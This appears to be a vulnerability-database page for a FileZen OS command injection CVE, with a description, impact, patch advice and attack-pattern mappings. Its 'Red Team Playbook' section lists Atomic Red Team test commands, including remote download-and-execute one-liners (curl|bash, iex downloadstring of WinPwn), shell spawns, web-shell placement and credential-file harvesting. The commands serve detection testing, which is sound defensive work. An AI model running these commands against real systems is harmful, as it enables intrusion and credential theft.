CVE-2026-25108
Overview
This vulnerability is an OS command injection flaw in Soliton Systems K.K. FileZen, specifically triggered when the FileZen Antivirus Check Option is enabled. The root cause lies in insufficient input validation of user-supplied data within HTTP requests, allowing injection of arbitrary operating system commands. The affected component is the FileZen web interface handling these specially crafted requests from authenticated users.
Vulnerability Description
FileZen contains an OS command injection vulnerability. When FileZen Antivirus Check Option is enabled, a logged-in user may send a specially crafted HTTP request to execute an arbitrary OS command.
Impact
An attacker with a valid FileZen user account can execute arbitrary operating system commands on the server, potentially leading to full system compromise. This includes unauthorized data access, modification, or deletion, and the ability to pivot within the network environment. The prerequisite is low-privileged authentication; no additional user interaction is required. Successful exploitation can result in significant business disruption, data breaches, and loss of system integrity.
Solution
Soliton Systems has released a security advisory accessible at https://www.soliton.co.jp/support/2026/006657.html detailing the vulnerability and provides updated FileZen versions that address this issue. Administrators should apply the vendor's patches as specified in the advisory to affected FileZen installations. No alternative workarounds are recommended; refer to the official advisory for precise patching instructions and version details.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in FileZen arises from an OS command injection flaw that can be exploited when the Antivirus Check Option is enabled. This weakness allows an authenticated user to craft a malicious HTTP request that can execute arbitrary operating system commands on the server hosting the application. The root cause of this vulnerability lies in improper validation of user input, which fails to sanitize or restrict the commands that can be executed. Consequently, an attacker could leverage this oversight to gain unauthorized access to system resources, manipulate files, or execute commands that could compromise the integrity and confidentiality of the system.
Exploitation of this vulnerability can occur through various attack vectors. A typical scenario involves an authenticated user, who may have legitimate access to the FileZen application, sending a specially crafted HTTP request that includes malicious payloads. This could be done using tools such as curl or Postman, where the attacker modifies the request parameters to include OS commands. Since the application does not adequately filter or validate these inputs, the server processes the request and executes the injected commands. Attackers could use this method to perform actions such as creating new user accounts, accessing sensitive data, or even deploying malware on the server, leading to further compromise.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on FileZen for file management and sharing. The potential for unauthorized command execution poses a serious business risk, as it could lead to data breaches, loss of sensitive information, and disruption of services. Moreover, the high CVSS score of 8.8 indicates a critical severity level, suggesting that exploitation is not only feasible but could also result in severe consequences. Organizations could face legal ramifications, reputational damage, and financial losses due to the fallout from a successful attack. Additionally, the presence of this vulnerability could undermine customer trust, especially if sensitive data is exposed or misused.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First, they should conduct thorough security assessments and penetration testing to identify any instances of the vulnerability within their FileZen installations. Regularly updating the application to the latest version can also help, as vendors often release patches to address known vulnerabilities. Furthermore, employing web application firewalls (WAFs) can provide an additional layer of protection by filtering out malicious requests before they reach the application. It is also crucial to enforce the principle of least privilege, ensuring that users have only the permissions necessary for their roles, thereby minimizing the potential impact of an exploited vulnerability.
In conclusion, the OS command injection vulnerability in FileZen represents a critical threat that organizations must address promptly. By understanding the technical details, potential attack vectors, and real-world implications, businesses can better prepare themselves against exploitation. Implementing robust detection and mitigation strategies will not only protect sensitive data but also enhance the overall security posture of the organization. As cyber threats continue to evolve, proactive measures and continuous monitoring will be essential in safeguarding against such vulnerabilities.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Soliton | Filezen | All |
cpe:2.3:a:soliton:filezen:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
58%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-25108 |
| soliton.co.jp |
GitHub CVE
|
https://www.soliton.co.jp/support/2026/006657.html |
| jvn.jp |
GitHub CVE
|
https://jvn.jp/en/jp/JVN84622767/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-25108 |